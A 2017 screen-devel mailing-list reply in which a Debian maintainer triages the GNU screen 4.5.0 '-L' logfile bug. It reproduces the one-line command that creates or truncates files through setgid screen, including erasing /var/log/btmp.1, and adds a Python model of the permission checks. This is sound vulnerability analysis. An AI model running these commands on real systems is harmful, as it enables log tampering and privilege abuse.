Re: [screen-devel] [bug #50142] root exploit 4.5.0


From: Axel Beckert
Subject: Re: [screen-devel] [bug #50142] root exploit 4.5.0
Date: Tue, 24 Jan 2017 21:30:55 +0100
User-agent: Mutt/1.5.21 (2010-09-15)

Hi,

not replying on Savannah as I don't yet get the exact impact of this.

On Tue, Jan 24, 2017 at 07:05:10PM +0000, anonymous wrote:
> > address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> > address@hidden:/etc (master)$ ls -l bla.bla
> > -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> > address@hidden:/etc (master)$ cat bla.bla
> > fail
> > address@hidden:/etc (master)$ 

On Debian Unstable this does not work as a root exploit as screen does
not run setuid. screen nevertheless runs setgid with group utmp:

-rwxr-sr-x 1 root utmp 457608 Jan 18 16:54 /usr/bin/screen*

So I'm able to gain access to /var/log/{btmp,wtmp,lastlog}*.

I, though, can't really write to it, just erase it:

/var/log → id
uid=1000(abe) gid=1000(abe) 
groups=1000(abe),4(adm),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev),113(kvm)
/var/log → ls -l btmp.1
-rw-rw---- 1 root        utmp         384 Dec 24 17:03 btmp.1
/var/log → screen -D -m -L btmp.1  echo fail
/var/log → ls -l btmp.1
-rw-rw---- 1 root utmp 0 Jan 24 21:06 btmp.1

So in my case nothing got written into the file (trying an existing
file without write permissions to the according directory).

Running the same game in /var/run/screen, which is group-writable for
utmp, I can, though, reproduce this a little bit better:

/var/run/screen → ls -l
total 0
drwx------ 2 abe  abe  40 Jan 24 21:17 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
/var/run/screen → screen -D -m -L bla.bla echo fail
/var/run/screen → ls -l
total 4
drwx------ 2 abe  abe  40 Jan 24 21:20 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
-rw-r--r-- 1 abe  utmp  6 Jan 24 21:20 bla.bla
/var/run/screen → cat bla.bla
fail
/var/run/screen → 

Am I right that, since screen later drops the set[ug]id rights, this
only works if the file is newly created because then it is created
with such permissions that I can later write into it without
set[ug]id?

                Kind regards, Axel
-- 
/~\  Plain Text Ribbon Campaign                   | Axel Beckert
\ /  Say No to HTML in E-Mail and News            | address@hidden  (Mail)
 X   See http://www.nonhtmlmail.org/campaign.html | address@hidden (Mail+Jabber)
/ \  I love long mails: http://email.is-not-s.ms/ | http://abe.noone.org/ (Web)
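
To make the closing question concrete, here is a small Python model of the two permission checks involved (an added example for this archive page, not screen's code and not from anyone in the thread). It assumes the sequence Axel hypothesises, the log file being opened while the setgid group is still active and written after it is dropped, and uses constructed numeric ids and directory modes.

```python
import stat

ROOT, ABE, UTMP = 0, 1000, 43          # constructed numeric ids

def may_write(mode, owner_uid, owner_gid, uid, groups):
    """Classic Unix owner/group/other check for write access."""
    if uid == 0:
        return True
    if uid == owner_uid:
        return bool(mode & stat.S_IWUSR)
    if owner_gid in groups:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

def simulate_logfile(directory, existing, ruid, rgid, egid, umask=0o022):
    """Model `screen -L <file>` in two phases (assumed sequence).

    directory: (mode, uid, gid) of the directory holding the log file.
    existing:  (mode, uid, gid) of the log file, or None if absent.
    Phase 1 runs with the setgid group still active (the open/creat,
    which truncates an existing file); phase 2 runs with only the real
    gid (the later writes of the logged output).
    Returns (truncated, created, written).
    """
    elevated = {rgid, egid}
    if existing is not None:
        # O_TRUNC on an existing file only needs write access to the file
        truncated = may_write(*existing, ruid, elevated)
        created, f = False, existing
    else:
        # creating needs write access to the directory; the new inode
        # gets owner=ruid, group=egid and mode 0666 & ~umask
        truncated = False
        created = may_write(*directory, ruid, elevated)
        f = (0o666 & ~umask, ruid, egid) if created else None
    # phase 2: setgid dropped, only the real gid remains
    written = f is not None and may_write(*f, ruid, {rgid})
    return truncated, created, written

def cases():
    """The three situations discussed in the mail (constructed modes)."""
    return {
        # /var/log/btmp.1: root:utmp 0660, directory root:root 0755
        "btmp.1": simulate_logfile((0o755, ROOT, ROOT), (0o660, ROOT, UTMP),
                                   ABE, ABE, UTMP),
        # /var/run/screen/bla.bla: new file, directory root:utmp 0775
        "run_screen": simulate_logfile((0o775, ROOT, UTMP), None,
                                       ABE, ABE, UTMP),
        # /etc/bla.bla without any setuid/setgid: nothing is possible
        "etc_no_setgid": simulate_logfile((0o755, ROOT, ROOT), None,
                                          ABE, ABE, ABE),
    }
```

Under this model the existing utmp-group log file is truncated but never written (matching the 0-byte btmp.1 above), while a freshly created file in a utmp-writable directory is owned by the real user and stays writable after the privilege drop.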